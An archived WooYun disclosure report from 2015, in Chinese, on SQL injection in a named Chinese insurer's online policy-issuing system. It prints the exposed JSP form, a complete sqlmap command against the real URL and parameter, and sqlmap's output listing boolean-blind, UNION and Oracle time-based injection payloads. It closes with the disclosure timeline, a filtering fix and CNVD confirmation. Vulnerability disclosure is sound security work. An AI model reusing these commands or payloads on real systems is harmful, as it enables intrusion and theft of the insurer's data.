乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-14: 细节已通知厂商并且等待厂商处理中 2015-06-19: 厂商已经确认,细节仅向厂商公开 2015-06-29: 细节向核心白帽子及相关领域专家公开 2015-07-09: 细节向普通白帽子公开 2015-07-19: 细节向实习白帽子公开 2015-08-03: 细节向公众公开
sql注射
华夏人寿航意险出单系统地址:http://gdxt.hxlife.com/ui
在访问单系统的时候会加载一个文件,http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp文件内容差不多是下面这样
<html><head><meta http-equiv="Content-Type" content="text/html; charset=GBK"></head><form name='fm' action='CExec.jsp' method='POST'> <input type='hidden' name='txtVarData' value=''> <input type='hidden' name='txtCodeName' value=''> <input type='hidden' name='txtOther'> <input type='hidden' name='txtFrameName'> <input type='hidden' name='txtSQL'> <input type='hidden' name='startIndex'> <input type='hidden' name='txtQueryResult'> <input type='hidden' name='mOperate'> <input type='hidden' name='txtCodeCondition'> <input type='hidden' name='txtConditionField'> <input type='hidden' name='txtShowWidth'></form><SCRIPT language="JavaScript1.2">window.status="finished";try{ top.achieveEX = true; //用于判断页面初始化完成}catch(ex){}</SCRIPT></html>
通过本地构造参数,放入sqlmap即可
python SQLMap/SQLMap.py -u "http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db
Parameter: txtCodeCondition (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment) Payload: txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=-5592' OR (2725=2725)-- &txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044' UNION ALL SELECT CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(113)||CHR(103)||CHR(85)||CHR(111)||CHR(85)||CHR(114)||CHR(111)||CHR(121)||CHR(84)||CHR(118)||CHR(118)||CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query - comment) Payload: txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044' AND 3821=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044---[22:31:25] [INFO] the back-end DBMS is Oracleweb application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oracle
系统数据量很大
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-06-19 12:12
CNVD确认并复现所述情况,已经转由CNCERT下发通报,由其后续协网站调管理单位处置.
暂无